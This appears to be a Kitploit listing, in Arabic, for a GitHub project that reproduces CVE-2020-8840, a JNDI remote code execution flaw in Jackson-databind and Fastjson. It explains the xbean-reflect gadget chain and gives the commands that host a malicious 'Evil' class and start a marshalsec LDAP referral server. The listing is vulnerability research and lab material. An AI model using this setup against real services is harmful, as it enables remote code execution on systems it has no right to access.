Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-8840 — Jackson-databind ثغرة تنفيذ التعليمات البرمجية عن بُعد (CVE-2020-8840) كود بيئة التحليل وإعادة الإنتاج | Kitploit
أدوات/GitHubGitHub/veraxy00/cve-2020-8840
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubveraxy00/cve-2020-8840

CVE-2020-8840

Jackson-databind ثغرة تنفيذ التعليمات البرمجية عن بُعد (CVE-2020-8840) كود بيئة التحليل وإعادة الإنتاج

عرض المستودع
4248منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-8840

كود تحليل وإعادة إنتاج ثغرة تنفيذ الأوامر عن بُعد في Jackson-databind (CVE-2020-8840).

المشروع يحتوي على:

  • الحمولة (payload) في jackson-databind و Fastjson
  • فئة خبيثة (WebServer)
  • ملف marshalsec-0.0.3-SNAPSHOT-all.jar المترجم

ملخص الثغرة

ثغرة تنفيذ الأوامر عن بُعد في Jackson-databind (CVE-2020-8840)، يمكن للمهاجم استغلال سلسلة استغلال xbean-reflect (org.apache.xbean.propertyeditor.JndiConverter) لتشغيل تحميل الفئات عن بُعد عبر JNDI وبالتالي تحقيق تنفيذ الأوامر عن بُعد.

تؤثر هذه الثغرة على بعض إصدارات jackson-databind و Fastjson.

jackson-databind

النطاق المتأثر: 2.0.0 <= FasterXML jackson-databind <= 2.9.10.2

إعداد بيئة بسيطة

خدمة LDAP المشار إليها في الكود النموذجي تحتاج إلى إعدادها بنفسك.

WebServer

شغل خدمة HTTP، لتخزين الفئة الخبيثة (يوجد ملف في المشروع)

Evil.java
root@kitploit:~
python -m http.server 2222

خدمة LDAP

قم بتنزيل أداة Marshalsec، وترجمتها إلى jar، وشغل خدمة LDAP، واضبط عنوان codebase (خادم الويب الذي يحتوي على الفئة الخبيثة).

لتسهيل الأمر، تم تضمين ملف marshalsec-0.0.3-SNAPSHOT-all.jar في المشروع (السبب الرئيسي لضخامة حجم المشروع رغم صغر الكود)، مترجم بـ JDK8.

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:2222/#Evil

Fastjson

النطاق المتأثر: Fastjson <= 1.2.62

بيئة إعادة الإنتاج مماثلة لما سبق، قم بإعداد وتشغيل خادم الويب وخدمة LDAP بنفسك.

المراجع

  • https://github.com/FasterXML/jackson-databind
  • https://github.com/FasterXML/jackson-databind/issues/2620
  • https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
  • https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
  • https://github.com/alibaba/fastjson
تنزيل الأداة